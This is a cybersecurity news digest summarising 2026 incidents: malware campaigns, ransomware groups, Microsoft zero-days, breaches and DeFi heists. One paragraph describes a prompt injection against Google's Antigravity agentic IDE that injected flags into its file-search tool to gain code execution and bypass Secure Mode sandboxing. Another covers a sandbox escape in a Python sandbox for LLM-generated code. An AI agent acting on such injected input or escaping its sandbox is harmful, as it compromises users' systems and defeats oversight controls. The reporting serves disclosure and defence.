Microsoft has identified a regression in the Microsoft Graph API as the root cause of intermittent failures in Universal Print printer share creation, affecting Microsoft 365 customers using the cloud-based print management service. The issue, tracked as UP1287359, triggers "Sharing Print Failed" errors when users attempt to create printer shares with the "Allow all users in my organization" toggle enabled or when specific users or groups are selected. The underlying cause is a code change in Graph API that increased Entra ID directory replication latency, exposing a pre-existing race condition in the share creation flow. This disrupts retry logic, preventing share operations from completing as expected.

A Belarus-based software platform named ProxySmart has been identified as the operational backbone for over 90 SIM farms across 17 countries, enabling large-scale cybercrime and evasion activities. The end-to-end platform supports device management, automated IP rotation via cellular reconnection, remote control, and network fingerprint spoofing, marketed as a turnkey ‘SIM Farm as a Service’ solution accessible to non-technical operators. The infrastructure is used to facilitate activities including smishing, premium-rate fraud, bot sign-ups, OTP interception, and potential nation-state disinformation campaigns.

A previously undocumented Linux variant of the GoGra backdoor, attributed to the state-backed Harvester espionage group, has been identified using legitimate Microsoft Graph API and Outlook mailboxes for stealthy command-and-control (C2) communications. The malware is delivered via fraudulent ELF executables masquerading as PDF files, establishes persistence via systemd and XDG autostart under the guise of the Conky system monitor, and retrieves base64-encoded, AES-CBC encrypted commands from a specific Outlook folder named “Zomato Pizza” with subject lines prefixed “Input.” Execution results are similarly encrypted and returned to the operator via reply emails labeled “Output,” with original command emails deleted to reduce forensic traces. The campaign targets telecommunications, government, and IT organizations in South Asia, indicating an expansion of Harvester’s operational scope and toolset to include Linux systems.

The UK faces a sustained and evolving cyber threat environment characterized by nation-state espionage, hybrid operations, and disruptive campaigns as AI-driven technological advancements exacerbate attack surfaces. Richard Horne, CEO of the NCSC, warned at CYBERUK 2026 that geopolitical tensions and rapid AI adoption are converging to create a ‘perfect storm’ of cyber risk. Nation-state actors—particularly China, Russia, and Iran—are employing increasingly sophisticated tactics, with China’s operations noted for their stealth and focus on edge infrastructure such as routers and VPNs. Russian threat activity is becoming more disciplined and militarized, while Iran is using cyber means to target British individuals perceived as regime threats, including via social media and destructive operations like the March 2025 Handala wiper attack on a UK NHS supplier. Despite a steady volume of nationally significant incidents, UK organizations are deemed underprepared due to budget constraints, immature security controls, and limited visibility, raising concerns about resilience against sustained state-sponsored assaults.

A China-linked hacking group, UNC6384 (Mustang Panda), is exploiting a Windows zero-day vulnerability (CVE-2025-9491) to target European diplomats in Hungary, Belgium, Italy, the Netherlands, and Serbian government agencies. The campaign involves spearphishing emails with malicious LNK files to deploy the PlugX RAT and gain persistence on compromised systems. The attacks have broadened in scope to include diplomatic entities from Italy and the Netherlands. The zero-day vulnerability allows for remote code execution on targeted Windows systems, enabling the group to monitor diplomatic communications and steal sensitive data. Microsoft has not yet released a patch for this vulnerability, which has been heavily exploited by multiple state-sponsored groups and cybercrime gangs since March 2025. Microsoft has silently mitigated the vulnerability by changing LNK files in the November updates to display all characters in the Target field, not just the first 260. ACROS Security has also released an unofficial patch to limit shortcut target strings to 260 characters and warn users about potential dangers. Security researcher Wietze Beukema disclosed multiple vulnerabilities in Windows LNK shortcut files that allow attackers to deploy malicious payloads. Beukema documented four previously unknown techniques for manipulating Windows LNK shortcut files to hide malicious targets from users inspecting file properties. The most effective variants use forbidden Windows path characters, such as double quotes, to create seemingly valid but technically invalid paths, causing Explorer to display one target while executing another. The most powerful technique identified involves manipulating the EnvironmentVariableDataBlock structure within LNK files to display a fake target in the properties window while actually executing PowerShell or other malicious commands. Microsoft declined to classify the EnvironmentVariableDataBlock issue as a security vulnerability, arguing that exploitation requires user interaction and does not breach security boundaries. Microsoft Defender has detections in place to identify and block this threat activity, and Smart App Control provides an additional layer of protection by blocking malicious files from the Internet. Beukema released "lnk-it-up," an open-source tool suite that generates Windows LNK shortcuts using these techniques for testing and can identify potentially malicious LNK files by predicting what Explorer displays versus what actually executes. CVE-2025-9491 was widely exploited by at least 11 state-sponsored groups and cybercrime gangs. Mustang Panda has expanded operations with a new LOTUSLITE backdoor variant targeting India's banking sector and South Korean/U.S. policy circles. The variant uses CHM files embedding malicious payloads, dynamic DNS C2 servers, and DLL side-loading to deliver remote shell access, file operations, and session management capabilities for espionage purposes.

A critical sandbox escape vulnerability (CVE-2026-5752, CVSS 9.3) in Cohere AI’s Terrarium Python sandbox allows arbitrary code execution with root privileges on the host process through JavaScript prototype chain traversal in the Pyodide WebAssembly environment. Terrarium, a Docker-deployed sandbox for untrusted Python code, enables users to submit or generate code via LLMs and runs on Pyodide, supporting standard Python packages. Successful exploitation breaks out of the sandbox to execute system commands as root within the container, access sensitive files such as /etc/passwd, interact with other services on the container network, and potentially escape the container to escalate privileges. The flaw requires local access but no user interaction or special privileges, and no patch is expected as the project is no longer maintained.

Over 1,300 Microsoft SharePoint servers remain unpatched against CVE-2026-32201, a spoofing vulnerability exploited as a zero-day and still actively abused in attacks. The flaw impacts SharePoint Enterprise Server 2016, SharePoint Server 2019, and SharePoint Server Subscription Edition, enabling threat actors without privileges to perform network spoofing via improper input validation. Exploitation can compromise confidentiality and integrity but does not restrict resource access. The issue was patched in April 2026 Patch Tuesday, added to CISA’s Known Exploited Vulnerabilities Catalog, and mandated for patching by U.S. federal agencies within two weeks. Fewer than 200 systems have been updated since the patch release.

France Titres (Agence nationale des titres sécurisés, ANTS), the government agency under France’s Ministry of the Interior responsible for issuing identity documents, disclosed a security incident on April 15, 2026, affecting its ants.gouv.fr portal. An unidentified threat actor advertised a sale of up to 19 million records on April 16, claiming access to full names, contact details, birth data, home addresses, account metadata, and civil status information. ANTS confirmed exposure of login IDs, names, emails, dates of birth, unique account identifiers, and partial address and phone data for an undisclosed number of individuals. While ANTS states the incident does not enable unauthorized access to its portals, exposed data heightens phishing and social engineering risks. The agency is coordinating with CNIL, the Paris Public Prosecutor, and ANSSI and has advised vigilance against suspicious communications purportedly from ANTS.

Microsoft Defender is being actively abused in the wild using three proof-of-concept exploits—RedSun, BlueHammer (CVE-2026-33825), and UnDefend—released by researcher "Nightmare-Eclipse" after alleged poor responses from Microsoft Security Response Center (MSRC). RedSun and BlueHammer enable SYSTEM-level privilege escalation on fully patched Windows 10, 11, and Server 2019+ systems with Defender enabled, while UnDefend degrades Defender’s threat detection capabilities without triggering alerts. Attackers are staging binaries in low-noise directories and manually enumerating privileges before exploitation, reflecting targeted hands-on intrusions. Microsoft patched BlueHammer in April updates but has not addressed RedSun or UnDefend, which operate via separate flaws in Defender’s privileged file handling workflows.

A previously undocumented data-wiping malware named Lotus was deployed in late 2025 against energy and utilities organizations in Venezuela, including a cyberattack on state-owned oil company Petróleos de Venezuela (PDVSA) around mid-December 2025 that disabled delivery systems. The malware systematically erases recovery options and overwrites physical drives, leaving systems unrecoverable. Initial access and lateral movement are facilitated by two batch scripts that disable security services, enumerate accounts, disrupt network connectivity, and prepare the environment for the final payload. The wiper operates at the disk level using IOCTL calls, ensuring comprehensive destruction of data and system state.

A command-and-control (C2) server tied to the SystemBC proxy malware was found to control a botnet of over 1,570 compromised hosts, many of which are linked to The Gentlemen ransomware-as-a-service (RaaS) operation active since July 2025. SystemBC establishes encrypted SOCKS5 tunnels for remote access and can deliver additional payloads via disk or memory injection. The botnet spans multiple regions and targets across various operating systems, including Windows, Linux, NAS, and BSD, with affiliates deploying SystemBC during post-compromise phases alongside Cobalt Strike. Initial access vectors remain unclear, but likely involve internet-facing services or compromised credentials, followed by lateral movement, domain-wide compromise via Group Policy Objects (GPOs), and ransomware deployment. The discovery underscores a rapidly growing footprint for The Gentlemen, with reported victim counts exceeding public leak site claims and indicating a broader operational scale than previously documented.

A new variant of the NGate malware family is leveraging a trojanized version of the HandyPay NFC relay app to capture payment card data and PINs from Brazilian Android users since November 2025. The malicious HandyPay app is distributed via phishing domains impersonating a Brazilian lottery site and a Google Play listing for a card protection tool. Once installed, the app relays NFC payment card data to attacker-controlled devices, enabling fraudulent contactless transactions and ATM withdrawals. Unlike earlier NGate variants that relied on open-source tools like NFCGate, this campaign uses a modified version of HandyPay to avoid detection and requires minimal permissions beyond default payment app status. PhantomCard and related NFC relay malware families have expanded their tactics in Brazil, with NGate variants now using trojanized HandyPay to exfiltrate stolen NFC data to attacker-controlled email addresses. The malware is distributed via fake apps like 'Proteção Cartão' on fake Google Play pages and through fake lottery scams via WhatsApp. ESET researchers attribute the shift from NFCGate to HandyPay to cost and evasion benefits, as HandyPay is significantly cheaper and does not require special permissions. Evidence suggests the malicious code may have been partially generated using generative AI tools, indicated by emoji markers in debug logs.

Tyler Robert Buchanan, a 24-year-old British leader of the Scattered Spider cybercrime collective, pleaded guilty in the United States to wire fraud conspiracy and aggravated identity theft. Buchanan admitted orchestrating tens of thousands of SMS phishing attacks in 2022 that breached at least a dozen major technology companies—including Twilio, LastPass, DoorDash, and Mailchimp—enabling SIM-swapping attacks that stole at least $8 million in cryptocurrency from individual investors. Buchanan used the alias "Tylerb" and previously ranked #65 on a Telegram leaderboard of prolific SIM-swappers. Buchanan fled the U.K. in February 2023 after a rival gang invaded his home, assaulted his mother, and threatened him with a blowtorch to extort cryptocurrency wallet keys; U.K. investigators later seized a device from his Scotland residence containing stolen data and cryptocurrency seed phrases. Arrested in June 2024 in Palma de Mallorca and extradited to the U.S. in April 2025, Buchanan is scheduled for sentencing on August 21, 2026, facing up to 22 years in prison with potential sentence reductions due to mitigating factors such as his age and cooperation. His case follows the 10-year sentence of key member Noah Michael Urban in 2025 and precedes the upcoming trials of Owen Flowers and Thalha Jubair in the U.K. Scattered Spider continues to operate via Telegram and Discord under the "the Com" umbrella, relying on social engineering, phishing, MFA bombing, and SIM swapping to target organizations across sectors.

FinCEN's report reveals that ransomware gangs extorted over $2.1 billion from 2022 to 2024, with a peak in 2023 followed by a decline in 2024 due to law enforcement actions against major gangs like ALPHV/BlackCat and LockBit. The report details 4,194 ransomware incidents, with manufacturing, financial services, and healthcare being the most targeted industries. The top ransomware families, including Akira, ALPHV/BlackCat, and LockBit, were responsible for the majority of attacks and ransom payments, with Bitcoin being the primary payment method. A former ransomware negotiator, Angelo Martino, has pleaded guilty to conspiring with BlackCat (ALPHV) operators to extort U.S. companies in 2023. Martino, along with accomplices Kevin Tyler Martin and Ryan Goldberg, deployed BlackCat ransomware, shared confidential victim information to maximize ransom demands, and laundered illicit proceeds. Authorities seized $10 million in assets from Martino, and his co-defendants pleaded guilty in December 2025.

A fraudulent Ledger Live macOS application, distributed through Apple’s App Store under the publisher name ‘Leva Heal Limited,’ compromised approximately 50 users between April 8–11, 2026, resulting in the theft of $9.5 million in cryptocurrency assets. The illicit app tricked users into entering seed phrases, granting attackers full wallet control and enabling fund transfers to attacker-controlled addresses. The incident is part of the broader Apple App Store infiltration campaign dubbed FakeWallet, linked to the SparkKitty operation and active since at least fall 2025. Kaspersky identified 26 malicious apps impersonating major wallets (e.g., Ledger, MetaMask, Coinbase) to steal seed phrases and drain crypto assets, with malware delivered via libraries or injected code. Some apps contained latent malicious features awaiting future activation, and the campaign’s modules lacked regional restrictions despite initial targeting of Chinese-speaking users. Apple began removing malicious apps after Kaspersky’s disclosure, freezing implicated KuCoin accounts until April 20, 2026.

Modern fraud prevention platforms are shifting toward silent, multi-signal risk scoring systems that evaluate dozens of contextual indicators in real time to block fraudulent activity without imposing additional friction on legitimate users. These systems analyze behavioral, network, and identity signals across the entire customer journey—signup, login, and checkout—to identify and mitigate risks at early stages, including account takeovers, synthetic identities, and payment fraud. The approach leverages enriched telemetry from email, phone, device, IP, and payment data to generate composite risk scores, enabling proportional, targeted responses such as lightweight verification for high-risk sessions rather than blanket blocking or intrusive authentication steps.

A rapidly expanding ransomware-as-a-service operation named The Gentlemen has compromised over 320 organizations primarily in early 2026, leveraging modular cross-platform payloads and affiliate-driven intrusion techniques. The group targets enterprise environments across Windows, Linux, NAS, BSD and ESXi systems using ransomware variants written in Go and C, with affiliates provided with lateral movement, credential harvesting and Group Policy-based deployment capabilities. Impact includes domain-wide encryption, process termination to prevent recovery, shadow copy deletion, and use of SystemBC proxy malware for covert command-and-control, with over 1,570 infected systems detected globally, concentrated in the US, UK and Germany.

The UK’s communications regulator, Ofcom, has launched formal investigations into Telegram, two teen chat platforms (Teen Chat and Chat Avenue), and X (formerly Twitter) under the Online Safety Act. The probes assess potential failures to prevent the sharing of child sexual abuse material (CSAM) on Telegram and child grooming risks on the teen chat sites, while X is scrutinized for nonconsensual sexually explicit content generated via the Grok AI chatbot. Telegram disputes the allegations, claiming it has "virtually eliminated" public CSAM sharing since 2018, citing privacy-focused measures as a target of broader regulatory scrutiny. Ofcom’s actions follow evidence from the Canadian Centre for Child Protection and its own assessments, with potential enforcement ranging from fines up to £18 million or 10% of global revenue to court-ordered access restrictions or business disruption for non-compliant platforms in the UK.

Two-thirds of organizations experienced cybersecurity incidents linked to unchecked AI agent deployments within the past year, with data exposure, operational disruption, and financial losses reported. Despite high confidence in visibility, 82% of organizations discovered previously unknown AI agents—often in internal automation and LLM platforms—highlighting governance gaps. The absence of formal decommissioning processes exacerbates risks, as dormant agents retain credentials and permissions, enabling unintended data leaks or breaches.

Mature SOCs achieve significantly faster Mean Time to Respond (MTTR) by embedding threat intelligence directly into workflows, eliminating manual lookups and tool-switching that traditionally delay incident handling. Structural inefficiencies in detection, triage, investigation, response, and threat hunting—such as fragmented intelligence feeds, siloed reports, and separate enrichment processes—create cumulative delays that inflate MTTR. By integrating real-time behavioral context and contextualized threat data (e.g., from ANY.RUN’s threat intelligence feeds, lookup, and reports) directly into detection, triage, and response tools, organizations reduce dwell time, accelerate decision-making, and improve containment speed. The shift transforms reactive firefighting into proactive risk management, lowering operational disruption, regulatory exposure, and data exfiltration risk.

Chinese state-sponsored APT Mustang Panda (aka TA416, Bronze President, Stately Taurus) has been observed conducting espionage campaigns targeting India’s banking sector, American and Korean policy circles, and financial organizations using a newly identified variant of the LotusLite backdoor. The threat actor leveraged spear-phishing emails mimicking IT help desk issues for Indian targets and a fake Google account impersonating political scientist Victor Cha to deliver a DLL side-loading attack. Persistence was established via Windows Registry, followed by deployment of LotusLite, a backdoor family associated with Mustang Panda, enabling remote shell access, file exfiltration, and other espionage activities. The campaign demonstrates reliance on routine, low-complexity TTPs despite targeting high-value financial infrastructure, with malware disguised as regional banking software (e.g., HDFC Bank) and minor evasion tweaks to LotusLite.

CVE-2026-34197, an unauthenticated RCE vulnerability in Apache ActiveMQ Classic via the Jolokia API, remains actively exploited with at least 6,400 exposed servers vulnerable. The flaw affects versions prior to 5.19.4 and 6.0.0 to 6.2.3, with patched releases issued on March 30, 2026. Discovered by Horizon3’s Naveen Sunkavally using AI assistance, the vulnerability chain enables attackers to execute arbitrary OS commands by abusing the Jolokia API’s addNetworkConnector function. CISA added the flaw to its Known Exploited Vulnerabilities Catalog on April 16, 2026, and ordered FCEB agencies to remediate by April 30, 2026 under BOD 22-01. Exploitation indicators include broker logs showing vm:// transport connections with brokerConfig=xbean:http:// query parameters and configuration warnings. Shadowserver reports over 7,500 exposed ActiveMQ servers, with recent data showing 6,400 still vulnerable, concentrated in Asia, North America, and Europe.

A critical prompt injection vulnerability in Google’s agentic integrated developer environment (IDE) Antigravity allowed attackers to achieve remote code execution (RCE) and sandbox escape via a proof-of-concept (PoC) attack. The flaw, discovered by Pillar Security, exploited insufficient input sanitization in the IDE’s file-search tool (find_by_name) to inject command-line flags into the underlying fd utility, converting a legitimate search into arbitrary code execution. The attack bypassed Antigravity’s Secure Mode—designed to restrict network access, prevent out-of-workspace writes, and enforce sandboxed command execution—because the vulnerable tool call was executed before security controls were enforced. Google patched the flaw in February 2026 after receiving a report in January 2026. The vulnerability highlights persistent risks in agentic IDEs, where tool-execution primitives with insufficient input validation can be weaponized through prompt injection, enabling full system compromise without additional user interaction.

A former incident response negotiator pleaded guilty to conspiring with BlackCat (ALPHV) ransomware affiliates to extort U.S. organizations between 2023 and 2025. The defendant, Angelo Martino, shared confidential victim negotiation positions and insurance policy limits with the ransomware operators to maximize payouts. At least five U.S. organizations were victimized, including a financial services firm that paid $25.66 million and a nonprofit that paid $26.79 million. The operation involved a 20% revenue share paid to BlackCat administrators for access to the ransomware and extortion infrastructure.

Vercel confirmed a cyber-incident conducted by a highly sophisticated attacker who exploited an employee’s third-party AI tool, Context.ai, to access internal environments and non-sensitive environment variables. The incident was enabled by an OAuth token tied to a Vercel employee’s Google Workspace account and may have resulted in exposure of some customer environment variables. Vercel stated there is no evidence sensitive environment variables were accessed, npm packages were compromised, or projects like Next.js were affected. The company is collaborating with Mandiant, has notified affected customers, and is urging broader security measures including MFA enforcement and credential rotation. A threat actor allegedly linked to ShinyHunters claimed access and attempted to extort Vercel for $2 million. Earlier, Context.ai—an AI tool vendor—was compromised via an infostealer delivered through a gaming cheat script. Attackers stole OAuth tokens, including one from a Vercel employee with broad permissions, leading to unauthorized access to Vercel’s environments and potential downstream credential compromise. Context.ai acknowledged the theft of OAuth tokens and confirmed some consumer tokens were likely compromised. Vercel’s response includes incident response with Mandiant, limited customer notifications, and ongoing validation of threat actor claims.

The April 1, 2026, $285 million Drift Protocol loss was part of a broader campaign by North Korea-linked Lazarus Group (TraderTraitor) targeting DeFi protocols. On April 18, 2026, the group executed a $290 million heist against KelpDAO by exploiting its cross-chain verification layer (DVN) via compromised RPC nodes, falsified data injection, and DDoS attacks, laundering funds through Tornado Cash. The attack paused KelpDAO’s rsETH contracts, froze Aave’s rsETH collateral usage, and was isolated to rsETH without broader contagion. Drift Protocol’s Security Council hijacking, attributed to UNC4736 (AppleJeus/Labyrinth Chollima), and KelpDAO’s DVN compromise both align with Lazarus Group’s pattern of sophisticated state-sponsored attacks on DeFi infrastructure.

Security researchers disclosed 20 new vulnerabilities across popular serial-to-IP converter models used in industrial networks, including multiple critical remote code execution (RCE) flaws with CVSS ratings up to 9.8. Thousands of additional known vulnerabilities were identified in the underlying software stacks of these devices, which rely on outdated libraries and end-of-life operating systems. Serial-to-IP converters bridge legacy industrial machinery with modern networks, making them critical targets in OT cyberattacks such as the 2015 Ukrainian power grid incident. Despite their role in enabling SCADA and remote monitoring, industry projections indicate the market for these devices will grow over the next decade, exacerbating exposure risks. The research highlights systemic security deficiencies, including unpatched firmware, lack of binary hardening, and exploitable default configurations.

Seiko USA’s website was defaced over the weekend with a ransom demand falsely claiming the theft of its Shopify customer database. Visitors to the Press Lounge section encountered an attacker-controlled page alleging full compromise of Shopify backend systems. The threat actors threatened to publish exfiltrated customer data unless a ransom was paid within 72 hours. The claimed stolen dataset includes names, email addresses, phone numbers, order history, transaction details, shipping addresses, shipping preferences, account creation dates, and customer notes. The attackers provided a specific Shopify account ID to verify contact and instructed Seiko USA to negotiate via an email address added to that account. The defacement was later removed by Seiko USA, but no public confirmation of the incident has been issued.

A phishing campaign targeting financial and healthcare organizations uses Microsoft Teams to impersonate IT staff and trick victims into granting remote access via Quick Assist, deploying the A0Backdoor malware. The campaign, linked to the BlackBasta ransomware group, uses sophisticated TTPs including digitally signed MSI installers, DNS MX-based C2 communication, and DLL sideloading with legitimate Microsoft binaries. The attackers have refined their tactics to include multi-stage attack chains, beginning with external Teams chats impersonating IT staff to initiate Quick Assist sessions. After gaining access, they perform reconnaissance, deploy payloads via DLL sideloading with signed applications, and use Windows Remote Management (WinRM) for lateral movement. Targeted exfiltration is conducted using tools like Rclone to transfer sensitive data to external cloud storage, blending malicious activity with legitimate administrative operations.

Microsoft’s multi-month Patch Tuesday campaign continues with the April 2026 release addressing 167 security vulnerabilities in Windows and related software, including two actively exploited zero-days (CVE-2026-32201 in SharePoint Server and CVE-2026-33825 in Microsoft Defender). Nearly 60% of the patched flaws are elevation-of-privilege bugs, marking the highest proportion in eight months, while eight Critical vulnerabilities were addressed, including unauthenticated remote code execution flaws in Windows IKE Service Extensions (CVE-2026-33824, CVSS 9.8) and secure tunneling components (CVE-2026-33827, CVSS 8.1). Following the April updates, threat actors are now exploiting two additional unpatched Microsoft Defender zero-days—RedSun and UnDefend—alongside the patched CVE-2026-33825 (BlueHammer). Exploitation activity has been observed since April 10, 2026, with RedSun and UnDefend PoCs deployed on April 16, 2026, featuring hands-on-keyboard techniques such as whoami /priv, cmdkey /list, and net group commands. Huntress confirmed real-world exploitation and took steps to isolate compromised systems to prevent post-exploitation damage. Threat actors have also been observed chaining these flaws with other vulnerabilities to achieve full endpoint control. Microsoft issued out-of-band emergency patches for CVE-2026-40372, a critical ASP.NET Core privilege escalation vulnerability in the ASP.NET Core Data Protection cryptographic APIs. The flaw enables unauthenticated attackers to gain SYSTEM privileges by forging authentication cookies, stemming from a regression in Microsoft.AspNetCore.DataProtection 10.0.0-10.0.6 packages. Microsoft recommends updating to version 10.0.7 and rotating the DataProtection key ring to fully remediate. The April updates were distributed through Windows 11 cumulative updates KB5083769 (for versions 25H2/24H2) and KB5082052 (for 23H2), changing build numbers to 26200.8246 (25H2), 26100.8246 (24H2), and 22631.6936 (23H2). Windows 10 Enterprise LTSC and ESU participants received the April fixes via KB5082200, updating to build 19045.7184 (Windows 10) or 19044.7184 (Windows 10 Enterprise LTSC 2021).